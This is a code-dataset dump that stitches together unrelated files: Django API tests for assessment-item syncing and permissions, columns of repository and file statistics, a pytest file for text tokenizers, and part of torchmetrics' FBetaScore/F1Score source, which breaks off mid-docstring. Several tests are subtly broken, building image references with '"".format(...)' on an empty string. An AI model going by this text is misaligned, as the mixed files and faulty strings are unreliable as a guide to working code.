assessmentitem["answers"] = answers
response = self.client.post(
self.sync_url,
[
generate_create_event(
[assessmentitem["contentnode"], assessmentitem["assessment_id"]],
ASSESSMENTITEM,
assessmentitem,
)
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
try:
ai = models.AssessmentItem.objects.get(
assessment_id=assessmentitem["assessment_id"]
)
except models.AssessmentItem.DoesNotExist:
self.fail("AssessmentItem was not created")
try:
file = ai.files.get()
self.assertEqual(file.id, image_file.id)
except models.File.DoesNotExist:
self.fail("File was not updated")
def test_create_assessmentitem_with_file_hints(self):
self.client.force_authenticate(user=self.user)
assessmentitem = self.assessmentitem_metadata
image_file = testdata.fileobj_exercise_image()
image_file.uploaded_by = self.user
image_file.save()
hints = "".format(
exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
)
assessmentitem["hints"] = hints
response = self.client.post(
self.sync_url,
[
generate_create_event(
[assessmentitem["contentnode"], assessmentitem["assessment_id"]],
ASSESSMENTITEM,
assessmentitem,
)
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
try:
ai = models.AssessmentItem.objects.get(
assessment_id=assessmentitem["assessment_id"]
)
except models.AssessmentItem.DoesNotExist:
self.fail("AssessmentItem was not created")
try:
file = ai.files.get()
self.assertEqual(file.id, image_file.id)
except models.File.DoesNotExist:
self.fail("File was not updated")
def test_create_assessmentitem_with_file_no_permission(self):
self.client.force_authenticate(user=self.user)
assessmentitem = self.assessmentitem_metadata
image_file = testdata.fileobj_exercise_image()
question = "".format(
exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
)
assessmentitem["question"] = question
response = self.client.post(
self.sync_url,
[
generate_create_event(
[assessmentitem["contentnode"], assessmentitem["assessment_id"]],
ASSESSMENTITEM,
assessmentitem,
)
],
format="json",
)
self.assertEqual(response.status_code, 400, response.content)
try:
models.AssessmentItem.objects.get(
assessment_id=assessmentitem["assessment_id"]
)
self.fail("AssessmentItem was created")
except models.AssessmentItem.DoesNotExist:
pass
self.assertIsNone(image_file.assessment_item)
def test_create_assessmentitems(self):
self.client.force_authenticate(user=self.user)
assessmentitem1 = self.assessmentitem_metadata
assessmentitem2 = self.assessmentitem_metadata
response = self.client.post(
self.sync_url,
[
generate_create_event(
[assessmentitem1["contentnode"], assessmentitem1["assessment_id"]],
ASSESSMENTITEM,
assessmentitem1,
),
generate_create_event(
[assessmentitem2["contentnode"], assessmentitem2["assessment_id"]],
ASSESSMENTITEM,
assessmentitem2,
),
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
try:
models.AssessmentItem.objects.get(
assessment_id=assessmentitem1["assessment_id"]
)
except models.AssessmentItem.DoesNotExist:
self.fail("AssessmentItem 1 was not created")
try:
models.AssessmentItem.objects.get(
assessment_id=assessmentitem2["assessment_id"]
)
except models.AssessmentItem.DoesNotExist:
self.fail("AssessmentItem 2 was not created")
def test_update_assessmentitem(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
new_question = "{}"
self.client.force_authenticate(user=self.user)
response = self.client.post(
self.sync_url,
[
generate_update_event(
[assessmentitem.contentnode_id, assessmentitem.assessment_id],
ASSESSMENTITEM,
{"question": new_question},
)
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
self.assertEqual(
models.AssessmentItem.objects.get(id=assessmentitem.id).question,
new_question,
)
def test_attempt_update_missing_assessmentitem(self):
self.client.force_authenticate(user=self.user)
response = self.client.post(
self.sync_url,
[
generate_update_event([
self.channel.main_tree.get_descendants()
.filter(kind_id=content_kinds.EXERCISE)
.first()
.id,
uuid.uuid4().hex
],
ASSESSMENTITEM,
{"question": "but why is it missing in the first place?"},
)
],
format="json",
)
self.assertEqual(response.status_code, 400, response.content)
self.assertEqual(response.data.get("errors")[0].get("error")[0], "Not found")
def test_update_assessmentitem_with_file(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
image_file = testdata.fileobj_exercise_image()
image_file.uploaded_by = self.user
image_file.save()
question = "".format(
exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
)
self.client.force_authenticate(user=self.user)
response = self.client.post(
self.sync_url,
[
generate_update_event(
[assessmentitem.contentnode_id, assessmentitem.assessment_id],
ASSESSMENTITEM,
{"question": question},
)
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
try:
file = assessmentitem.files.get()
self.assertEqual(file.id, image_file.id)
except models.File.DoesNotExist:
self.fail("File was not updated")
def test_update_assessmentitem_with_file_no_permissions(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
image_file = testdata.fileobj_exercise_image()
question = "".format(
exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
)
self.client.force_authenticate(user=self.user)
response = self.client.post(
self.sync_url,
[
generate_update_event(
[assessmentitem.contentnode_id, assessmentitem.assessment_id],
ASSESSMENTITEM,
{"question": question},
)
],
format="json",
)
self.assertEqual(response.status_code, 400, response.content)
try:
file = assessmentitem.files.get()
self.assertNotEqual(file.id, image_file.id)
self.fail("File was updated")
except models.File.DoesNotExist:
pass
def test_update_assessmentitem_remove_file(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
image_file = testdata.fileobj_exercise_image()
image_file.assessment_item = assessmentitem
image_file.save()
question = "A different question"
self.client.force_authenticate(user=self.user)
response = self.client.post(
self.sync_url,
[
generate_update_event(
[assessmentitem.contentnode_id, assessmentitem.assessment_id],
ASSESSMENTITEM,
{"question": question},
)
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
try:
assessmentitem.files.get()
self.fail("File was not removed")
except models.File.DoesNotExist:
pass
def test_update_assessmentitems(self):
assessmentitem1 = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
assessmentitem2 = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
new_question = "{}"
self.client.force_authenticate(user=self.user)
response = self.client.post(
self.sync_url,
[
generate_update_event(
[assessmentitem1.contentnode_id, assessmentitem1.assessment_id],
ASSESSMENTITEM,
{"question": new_question},
),
generate_update_event(
[assessmentitem2.contentnode_id, assessmentitem2.assessment_id],
ASSESSMENTITEM,
{"question": new_question},
),
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
self.assertEqual(
models.AssessmentItem.objects.get(id=assessmentitem1.id).question,
new_question,
)
self.assertEqual(
models.AssessmentItem.objects.get(id=assessmentitem2.id).question,
new_question,
)
def test_update_assessmentitem_empty(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
self.client.force_authenticate(user=self.user)
response = self.client.post(
self.sync_url,
[
generate_update_event(
[assessmentitem.contentnode_id, assessmentitem.assessment_id],
ASSESSMENTITEM,
{},
)
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
def test_update_assessmentitem_unwriteable_fields(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
self.client.force_authenticate(user=self.user)
response = self.client.post(
self.sync_url,
[
generate_update_event(
[assessmentitem.contentnode_id, assessmentitem.assessment_id],
ASSESSMENTITEM,
{"not_a_field": "not_a_value"},
)
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
def test_delete_assessmentitem(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
self.client.force_authenticate(user=self.user)
response = self.client.post(
self.sync_url,
[
generate_delete_event(
[assessmentitem.contentnode_id, assessmentitem.assessment_id],
ASSESSMENTITEM,
)
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
try:
models.AssessmentItem.objects.get(id=assessmentitem.id)
self.fail("AssessmentItem was not deleted")
except models.AssessmentItem.DoesNotExist:
pass
def test_delete_assessmentitems(self):
assessmentitem1 = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
assessmentitem2 = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
self.client.force_authenticate(user=self.user)
response = self.client.post(
self.sync_url,
[
generate_delete_event(
[assessmentitem1.contentnode_id, assessmentitem1.assessment_id],
ASSESSMENTITEM,
),
generate_delete_event(
[assessmentitem2.contentnode_id, assessmentitem2.assessment_id],
ASSESSMENTITEM,
),
],
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
try:
models.AssessmentItem.objects.get(id=assessmentitem1.id)
self.fail("AssessmentItem 1 was not deleted")
except models.AssessmentItem.DoesNotExist:
pass
try:
models.AssessmentItem.objects.get(id=assessmentitem2.id)
self.fail("AssessmentItem 2 was not deleted")
except models.AssessmentItem.DoesNotExist:
pass
class CRUDTestCase(StudioAPITestCase):
@property
def assessmentitem_metadata(self):
return {
"assessment_id": uuid.uuid4().hex,
"contentnode": self.channel.main_tree.get_descendants()
.filter(kind_id=content_kinds.EXERCISE)
.first()
.id,
}
@property
def assessmentitem_db_metadata(self):
return {
"assessment_id": uuid.uuid4().hex,
"contentnode_id": self.channel.main_tree.get_descendants()
.filter(kind_id=content_kinds.EXERCISE)
.first()
.id,
}
def setUp(self):
super(CRUDTestCase, self).setUp()
self.channel = testdata.channel()
self.user = testdata.user()
self.channel.editors.add(self.user)
def test_create_assessmentitem(self):
self.client.force_authenticate(user=self.user)
assessmentitem = self.assessmentitem_metadata
response = self.client.post(
reverse("assessmentitem-list"), assessmentitem, format="json",
)
self.assertEqual(response.status_code, 201, response.content)
try:
models.AssessmentItem.objects.get(
assessment_id=assessmentitem["assessment_id"]
)
except models.AssessmentItem.DoesNotExist:
self.fail("AssessmentItem was not created")
def test_create_assessmentitem_no_node_permission(self):
self.client.force_authenticate(user=self.user)
new_channel = testdata.channel()
new_channel_exercise = (
new_channel.main_tree.get_descendants()
.filter(kind_id=content_kinds.EXERCISE)
.first()
.id
)
assessmentitem = self.assessmentitem_metadata
assessmentitem["contentnode"] = new_channel_exercise
response = self.client.post(
reverse("assessmentitem-list"), assessmentitem, format="json",
)
self.assertEqual(response.status_code, 400, response.content)
def test_create_assessmentitem_with_file(self):
self.client.force_authenticate(user=self.user)
assessmentitem = self.assessmentitem_metadata
image_file = testdata.fileobj_exercise_image()
image_file.uploaded_by = self.user
image_file.save()
question = "".format(
exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
)
assessmentitem["question"] = question
response = self.client.post(
reverse("assessmentitem-list"), assessmentitem, format="json",
)
self.assertEqual(response.status_code, 201, response.content)
try:
ai = models.AssessmentItem.objects.get(
assessment_id=assessmentitem["assessment_id"]
)
except models.AssessmentItem.DoesNotExist:
self.fail("AssessmentItem was not created")
try:
file = ai.files.get()
self.assertEqual(file.id, image_file.id)
except models.File.DoesNotExist:
self.fail("File was not updated")
def test_create_assessmentitem_with_file_no_permission(self):
self.client.force_authenticate(user=self.user)
assessmentitem = self.assessmentitem_metadata
image_file = testdata.fileobj_exercise_image()
question = "".format(
exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
)
assessmentitem["question"] = question
response = self.client.post(
reverse("assessmentitem-list"), assessmentitem, format="json",
)
self.assertEqual(response.status_code, 400, response.content)
try:
models.AssessmentItem.objects.get(
assessment_id=assessmentitem["assessment_id"]
)
self.fail("AssessmentItem was created")
except models.AssessmentItem.DoesNotExist:
pass
self.assertIsNone(image_file.assessment_item)
def test_update_assessmentitem(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
new_question = "{}"
self.client.force_authenticate(user=self.user)
response = self.client.patch(
reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
{"question": new_question},
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
self.assertEqual(
models.AssessmentItem.objects.get(id=assessmentitem.id).question,
new_question,
)
def test_update_assessmentitem_empty(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
self.client.force_authenticate(user=self.user)
response = self.client.patch(
reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
{},
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
def test_update_assessmentitem_unwriteable_fields(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
self.client.force_authenticate(user=self.user)
response = self.client.patch(
reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
{"not_a_field": "not_a_value"},
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
def test_update_assessmentitem_with_file(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
image_file = testdata.fileobj_exercise_image()
image_file.uploaded_by = self.user
image_file.save()
question = "".format(
exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
)
self.client.force_authenticate(user=self.user)
response = self.client.patch(
reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
{"question": question},
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
try:
file = assessmentitem.files.get()
self.assertEqual(file.id, image_file.id)
except models.File.DoesNotExist:
self.fail("File was not updated")
def test_update_assessmentitem_with_file_no_permissions(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
image_file = testdata.fileobj_exercise_image()
question = "".format(
exercises.IMG_PLACEHOLDER, image_file.checksum, image_file.file_format_id
)
self.client.force_authenticate(user=self.user)
response = self.client.patch(
reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
{"question": question},
format="json",
)
self.assertEqual(response.status_code, 400, response.content)
try:
file = assessmentitem.files.get()
self.assertNotEqual(file.id, image_file.id)
self.fail("File was updated")
except models.File.DoesNotExist:
pass
def test_update_assessmentitem_remove_file(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
image_file = testdata.fileobj_exercise_image()
image_file.assessment_item = assessmentitem
image_file.save()
question = "A different question"
self.client.force_authenticate(user=self.user)
response = self.client.patch(
reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id}),
{"question": question},
format="json",
)
self.assertEqual(response.status_code, 200, response.content)
try:
assessmentitem.files.get()
self.fail("File was not removed")
except models.File.DoesNotExist:
pass
def test_delete_assessmentitem(self):
assessmentitem = models.AssessmentItem.objects.create(
**self.assessmentitem_db_metadata
)
self.client.force_authenticate(user=self.user)
response = self.client.delete(
reverse("assessmentitem-detail", kwargs={"pk": assessmentitem.id})
)
self.assertEqual(response.status_code, 204, response.content)
try:
models.AssessmentItem.objects.get(id=assessmentitem.id)
self.fail("AssessmentItem was not deleted")
except models.AssessmentItem.DoesNotExist:
pass
| 36.381649
| 87
| 0.596148
| 2,462
| 27,359
| 6.416734
| 0.057271
| 0.033042
| 0.061527
| 0.046145
| 0.929991
| 0.923345
| 0.915432
| 0.897012
| 0.865173
| 0.851563
| 0
| 0.006257
| 0.31072
| 27,359
| 751
| 88
| 36.430093
| 0.831477
| 0
| 0
| 0.759232
| 0
| 0
| 0.068387
| 0.013414
| 0
| 0
| 0
| 0
| 0.062038
| 1
| 0.050222
| false
| 0.014771
| 0.017725
| 0.007386
| 0.078287
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a2d417664817bfb617d77d582b6df55946e2bfc
| 3,956
|
py
|
Python
|
tests/extra/test_wrapper_tokenizers.py
|
PRHLT/multimodal_keras_wrapper
|
0a088f36e5d4251ce465974f07d1a7f21b80203e
|
[
"MIT"
] | 7
|
2018-04-08T03:06:24.000Z
|
2019-04-24T07:56:38.000Z
|
tests/extra/test_wrapper_tokenizers.py
|
PRHLT/multimodal_keras_wrapper
|
0a088f36e5d4251ce465974f07d1a7f21b80203e
|
[
"MIT"
] | null | null | null |
tests/extra/test_wrapper_tokenizers.py
|
PRHLT/multimodal_keras_wrapper
|
0a088f36e5d4251ce465974f07d1a7f21b80203e
|
[
"MIT"
] | 7
|
2017-12-04T09:06:35.000Z
|
2021-04-19T07:47:46.000Z
|
# -*- coding: utf-8 -*-
import pytest
from keras_wrapper.extra.tokenizers import *
def test_tokenize_basic():
untokenized_string = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
expected_string = u'This , ¿ is a , . sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 , ! ! ! '
tokenized_string = tokenize_basic(untokenized_string, lowercase=False)
tokenized_string_lower = tokenize_basic(untokenized_string, lowercase=True)
assert expected_string == tokenized_string
assert expected_string.lower() == tokenized_string_lower
def test_tokenize_aggressive():
untokenized_string = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
expected_string = u'This is a sentence with weird\xbb symbols ù ä ë ï ö ü ^首先'
tokenized_string = tokenize_aggressive(untokenized_string, lowercase=False)
tokenized_string_lower = tokenize_aggressive(untokenized_string, lowercase=True)
assert expected_string == tokenized_string
assert expected_string.lower() == tokenized_string_lower
def test_tokenize_icann():
untokenized_string = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
expected_string = u'This , ¿is a , . sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 , ! '
tokenized_string_lower = tokenize_icann(untokenized_string)
assert expected_string.lower() == tokenized_string_lower
def test_tokenize_montreal():
untokenized_string = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
expected_string = u'This ¿is a sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 !!!'
tokenized_string_lower = tokenize_montreal(untokenized_string)
assert expected_string.lower() == tokenized_string_lower
def test_tokenize_soft():
untokenized_string = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
expected_string = u'This , ¿is a , . sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 , ! '
tokenized_string = tokenize_soft(untokenized_string, lowercase=False)
tokenized_string_lower = tokenize_soft(untokenized_string, lowercase=True)
assert expected_string == tokenized_string
assert expected_string.lower() == tokenized_string_lower
def test_tokenize_none():
untokenized_string = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!\n\n'
expected_string = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!'
tokenized_string = tokenize_none(untokenized_string)
assert expected_string == tokenized_string
def test_tokenize_none_char():
untokenized_string = u'This, ¿is a > < , .sentence with weird\xbb symbols'
expected_string = u'T h i s , <space> ¿ i s <space> a <space> > <space> < <space> , <space> . s e n t e n c e <space> w i t h <space> w e i r d \xbb <space> s y m b o l s'
tokenized_string = tokenize_none_char(untokenized_string)
assert expected_string == tokenized_string
def test_tokenize_CNN_sentence():
# TODO
pass
def test_tokenize_questions():
# TODO
pass
def test_tokenize_bpe():
# TODO
pass
def test_detokenize_none():
tokenized_string = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!'
expected_string = u'This, ¿is a , .sentence with weird\xbb symbols ù ä ë ï ö ü ^首先 ,!!!'
detokenized_string = detokenize_none(tokenized_string)
assert expected_string == detokenized_string
def test_detokenize_none_char():
tokenized_string = u'T h i s , <space> ¿ i s <space> a <space> > <space> < <space> , <space> . s e n t e n c e <space> w i t h <space> w e i r d \xbb <space> s y m b o l s'
expected_string = u'This, ¿is a > < , .sentence with weird\xbb symbols'
detokenized_string = detokenize_none_char(tokenized_string)
assert expected_string == detokenized_string
if __name__ == '__main__':
pytest.main([__file__])
| 43
| 176
| 0.697169
| 626
| 3,956
| 4.22524
| 0.116613
| 0.136106
| 0.066541
| 0.090737
| 0.890359
| 0.832514
| 0.832514
| 0.793195
| 0.726276
| 0.726276
| 0
| 0.000316
| 0.201213
| 3,956
| 91
| 177
| 43.472527
| 0.831329
| 0.0091
| 0
| 0.42623
| 0
| 0.229508
| 0.36143
| 0
| 0
| 0
| 0
| 0.010989
| 0.196721
| 1
| 0.196721
| false
| 0.04918
| 0.032787
| 0
| 0.229508
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0a716964453717bb3fb160fc73d7a5fd715943b1
| 16,950
|
py
|
Python
|
torchmetrics/classification/f_beta.py
|
radandreicristian/metrics
|
8048c77229f47d82d1adc391407f9cd2f5a8e9fa
|
[
"Apache-2.0"
] | 2
|
2022-01-20T12:33:18.000Z
|
2022-03-25T04:30:02.000Z
|
torchmetrics/classification/f_beta.py
|
radandreicristian/metrics
|
8048c77229f47d82d1adc391407f9cd2f5a8e9fa
|
[
"Apache-2.0"
] | null | null | null |
torchmetrics/classification/f_beta.py
|
radandreicristian/metrics
|
8048c77229f47d82d1adc391407f9cd2f5a8e9fa
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Callable, Optional
import torch
from deprecate import deprecated, void
from torch import Tensor
from torchmetrics.classification.stat_scores import StatScores
from torchmetrics.functional.classification.f_beta import _fbeta_compute
from torchmetrics.utilities import _future_warning
from torchmetrics.utilities.enums import AverageMethod
class FBetaScore(StatScores):
r"""
Computes `F-score`_, specifically:
.. math::
F_\beta = (1 + \beta^2) * \frac{\text{precision} * \text{recall}}
{(\beta^2 * \text{precision}) + \text{recall}}
Where :math:`\beta` is some positive real factor. Works with binary, multiclass, and multilabel data.
Accepts logit scores or probabilities from a model output or integer class values in prediction.
Works with multi-dimensional preds and target.
Forward accepts
- ``preds`` (float or long tensor): ``(N, ...)`` or ``(N, C, ...)`` where C is the number of classes
- ``target`` (long tensor): ``(N, ...)``
If preds and target are the same shape and preds is a float tensor, we use the ``self.threshold`` argument
to convert into integer labels. This is the case for binary and multi-label logits and probabilities.
If preds has an extra dimension as in the case of multi-class scores we perform an argmax on ``dim=1``.
Args:
num_classes:
Number of classes. Necessary for ``'macro'``, ``'weighted'`` and ``None`` average methods.
beta:
Beta coefficient in the F measure.
threshold:
Threshold for transforming probability or logit predictions to binary (0,1) predictions, in the case
of binary or multi-label inputs. Default value of 0.5 corresponds to input being probabilities.
average:
Defines the reduction that is applied. Should be one of the following:
- ``'micro'`` [default]: Calculate the metric globally, across all samples and classes.
- ``'macro'``: Calculate the metric for each class separately, and average the
metrics across classes (with equal weights for each class).
- ``'weighted'``: Calculate the metric for each class separately, and average the
metrics across classes, weighting each class by its support (``tp + fn``).
- ``'none'`` or ``None``: Calculate the metric for each class separately, and return
the metric for every class.
- ``'samples'``: Calculate the metric for each sample, and average the metrics
across samples (with equal weights for each sample).
.. note:: What is considered a sample in the multi-dimensional multi-class case
depends on the value of ``mdmc_average``.
.. note:: If ``'none'`` and a given class doesn't occur in the `preds` or `target`,
the value for the class will be ``nan``.
mdmc_average:
Defines how averaging is done for multi-dimensional multi-class inputs (on top of the
``average`` parameter). Should be one of the following:
- ``None`` [default]: Should be left unchanged if your data is not multi-dimensional
multi-class.
- ``'samplewise'``: In this case, the statistics are computed separately for each
sample on the ``N`` axis, and then averaged over samples.
The computation for each sample is done by treating the flattened extra axes ``...``
(see :ref:`references/modules:input types`) as the ``N`` dimension within the sample,
and computing the metric for the sample based on that.
- ``'global'``: In this case the ``N`` and ``...`` dimensions of the inputs
(see :ref:`references/modules:input types`)
are flattened into a new ``N_X`` sample axis, i.e. the inputs are treated as if they
were ``(N_X, C)``. From here on the ``average`` parameter applies as usual.
ignore_index:
Integer specifying a target class to ignore. If given, this class index does not contribute
to the returned score, regardless of reduction method. If an index is ignored, and ``average=None``
or ``'none'``, the score for the ignored class will be returned as ``nan``.
top_k:
Number of highest probability or logit score predictions considered to find the correct label,
relevant only for (multi-dimensional) multi-class inputs. The
default value (``None``) will be interpreted as 1 for these inputs.
Should be left at default (``None``) for all other types of inputs.
multiclass:
Used only in certain special cases, where you want to treat inputs as a different type
than what they appear to be. See the parameter's
:ref:`documentation section <references/modules:using the multiclass parameter>`
for a more detailed explanation and examples.
compute_on_step:
Forward only calls ``update()`` and return ``None`` if this is set to ``False``.
dist_sync_on_step:
Synchronize metric state across processes at each ``forward()``
before returning the value at the step
process_group:
Specify the process group on which synchronization is called.
default: ``None`` (which selects the entire world)
dist_sync_fn:
Callback that performs the allgather operation on the metric state. When ``None``, DDP
will be used to perform the allgather.
Raises:
ValueError:
If ``average`` is none of ``"micro"``, ``"macro"``, ``"weighted"``, ``"none"``, ``None``.
Example:
>>> from torchmetrics import FBetaScore
>>> target = torch.tensor([0, 1, 2, 0, 1, 2])
>>> preds = torch.tensor([0, 2, 1, 0, 0, 1])
>>> f_beta = FBetaScore(num_classes=3, beta=0.5)
>>> f_beta(preds, target)
tensor(0.3333)
"""
def __init__(
self,
num_classes: Optional[int] = None,
beta: float = 1.0,
threshold: float = 0.5,
average: str = "micro",
mdmc_average: Optional[str] = None,
ignore_index: Optional[int] = None,
top_k: Optional[int] = None,
multiclass: Optional[bool] = None,
compute_on_step: bool = True,
dist_sync_on_step: bool = False,
process_group: Optional[Any] = None,
dist_sync_fn: Callable = None,
) -> None:
self.beta = beta
allowed_average = list(AverageMethod)
if average not in allowed_average:
raise ValueError(f"The `average` has to be one of {allowed_average}, got {average}.")
super().__init__(
reduce="macro" if average in [AverageMethod.WEIGHTED, AverageMethod.NONE] else average,
mdmc_reduce=mdmc_average,
threshold=threshold,
top_k=top_k,
num_classes=num_classes,
multiclass=multiclass,
ignore_index=ignore_index,
compute_on_step=compute_on_step,
dist_sync_on_step=dist_sync_on_step,
process_group=process_group,
dist_sync_fn=dist_sync_fn,
)
self.average = average
def compute(self) -> Tensor:
"""Computes fbeta over state."""
tp, fp, tn, fn = self._get_final_stats()
return _fbeta_compute(tp, fp, tn, fn, self.beta, self.ignore_index, self.average, self.mdmc_reduce)
class FBeta(FBetaScore):
r"""
Computes `F-score`_, specifically:
.. deprecated:: v0.7
Use :class:`torchmetrics.FBetaScore`. Will be removed in v0.8.
Example::
>>> f_beta = FBetaScore(num_classes=3, beta=0.5)
>>> f_beta(torch.tensor([0, 2, 1, 0, 0, 1]), torch.tensor([0, 1, 2, 0, 1, 2]))
tensor(0.3333)
"""
@deprecated(target=FBetaScore, deprecated_in="0.7", remove_in="0.8", stream=_future_warning)
def __init__(
self,
num_classes: Optional[int] = None,
beta: float = 1.0,
threshold: float = 0.5,
average: str = "micro",
mdmc_average: Optional[str] = None,
ignore_index: Optional[int] = None,
top_k: Optional[int] = None,
multiclass: Optional[bool] = None,
compute_on_step: bool = True,
dist_sync_on_step: bool = False,
process_group: Optional[Any] = None,
dist_sync_fn: Callable = None,
) -> None:
void(
num_classes,
beta,
threshold,
average,
mdmc_average,
ignore_index,
top_k,
multiclass,
compute_on_step,
dist_sync_on_step,
process_group,
dist_sync_fn,
)
class F1Score(FBetaScore):
"""Computes F1 metric. F1 metrics correspond to a harmonic mean of the precision and recall scores.
Works with binary, multiclass, and multilabel data. Accepts logits or probabilities from a model
output or integer class values in prediction. Works with multi-dimensional preds and target.
Forward accepts
- ``preds`` (float or long tensor): ``(N, ...)`` or ``(N, C, ...)`` where C is the number of classes
- ``target`` (long tensor): ``(N, ...)``
If preds and target are the same shape and preds is a float tensor, we use the ``self.threshold`` argument.
This is the case for binary and multi-label logits.
If preds has an extra dimension as in the case of multi-class scores we perform an argmax on ``dim=1``.
Args:
num_classes:
Number of classes. Necessary for ``'macro'``, ``'weighted'`` and ``None`` average methods.
threshold:
Threshold for transforming probability or logit predictions to binary (0,1) predictions, in the case
of binary or multi-label inputs. Default value of 0.5 corresponds to input being probabilities.
average:
Defines the reduction that is applied. Should be one of the following:
- ``'micro'`` [default]: Calculate the metric globally, across all samples and classes.
- ``'macro'``: Calculate the metric for each class separately, and average the
metrics across classes (with equal weights for each class).
- ``'weighted'``: Calculate the metric for each class separately, and average the
metrics across classes, weighting each class by its support (``tp + fn``).
- ``'none'`` or ``None``: Calculate the metric for each class separately, and return
the metric for every class.
- ``'samples'``: Calculate the metric for each sample, and average the metrics
across samples (with equal weights for each sample).
.. note:: What is considered a sample in the multi-dimensional multi-class case
depends on the value of ``mdmc_average``.
mdmc_average:
Defines how averaging is done for multi-dimensional multi-class inputs (on top of the
``average`` parameter). Should be one of the following:
- ``None`` [default]: Should be left unchanged if your data is not multi-dimensional
multi-class.
- ``'samplewise'``: In this case, the statistics are computed separately for each
sample on the ``N`` axis, and then averaged over samples.
The computation for each sample is done by treating the flattened extra axes ``...``
(see :ref:`references/modules:input types`) as the ``N`` dimension within the sample,
and computing the metric for the sample based on that.
- ``'global'``: In this case the ``N`` and ``...`` dimensions of the inputs
(see :ref:`references/modules:input types`)
are flattened into a new ``N_X`` sample axis, i.e. the inputs are treated as if they
were ``(N_X, C)``. From here on the ``average`` parameter applies as usual.
ignore_index:
Integer specifying a target class to ignore. If given, this class index does not contribute
to the returned score, regardless of reduction method. If an index is ignored, and ``average=None``
or ``'none'``, the score for the ignored class will be returned as ``nan``.
top_k:
Number of highest probability or logit score predictions considered to find the correct label,
relevant only for (multi-dimensional) multi-class inputs. The
default value (``None``) will be interpreted as 1 for these inputs.
Should be left at default (``None``) for all other types of inputs.
multiclass:
